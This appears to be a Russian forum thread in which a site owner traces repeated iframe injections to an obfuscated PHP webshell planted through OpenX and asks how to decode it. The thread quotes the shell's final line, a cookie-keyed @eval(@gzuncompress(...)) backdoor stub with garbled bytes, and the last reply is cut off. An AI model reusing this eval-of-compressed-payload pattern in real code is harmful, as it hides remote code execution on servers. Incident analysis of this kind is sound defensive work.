Форум Сайтостроение Администрирование серверов

Как поймать хулигана?

f0x
На сайте с 20.09.2006
Offline
116
f0x
1245

Ситуация следующая.

Хулиган постоянно вставляет iframe в одну из страниц сайта.

Вставляет на в саму страницу, а иммено в текст этой страницы в БД (mysql)

Менял пароль к бд, к админке... не помогло.

Полагаю есть дыра в коде.

Помогите советом, как отловить поганца и найти дыру?

SM
На сайте с 08.12.2008
Offline
13
SEO-MONSTR
#1
f0x:
Ситуация следующая.
Хулиган постоянно вставляет iframe в одну из страниц сайта.
Вставляет на в саму страницу, а иммено в текст этой страницы в БД (mysql)
Менял пароль к бд, к админке... не помогло.
Полагаю есть дыра в коде.

Помогите советом, как отловить поганца и найти дыру?

На какой CMS сайт работает укажите?

f0x
На сайте с 20.09.2006
Offline
116
f0x
#2
SEO-MONSTR:
На какой CMS сайт работает укажите?

Все писалось самостоятельно

Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#3

Попросить сисадмина поставить mod_security

Не стоит плодить сущности без необходимости
f0x
На сайте с 20.09.2006
Offline
116
f0x
#4
Andreyka:
Попросить сисадмина поставить mod_security

Спасибо, разберусь с модом.

НАШЕЛ таки))) файл php-шный в директории Openx, куда баннеры подгружаются, через этот софт поимели.

Запрос к файлу по POST приходил с амерского сервака

Полагаю это пхпшелл, закриптован код странно, не зенд.

файл заканчивается:


str_repeat(md5($_SERVER["HTTP_USER_AGENT"].$_COOKIE["z_salt"]),72);@eval(@gzuncompress(($ІSѓ_іBa›њ51Д^51Д)));

Есть ли варианты восстановить исходный код файла?

Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#5

Выполнять по очереди каждое из действ

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий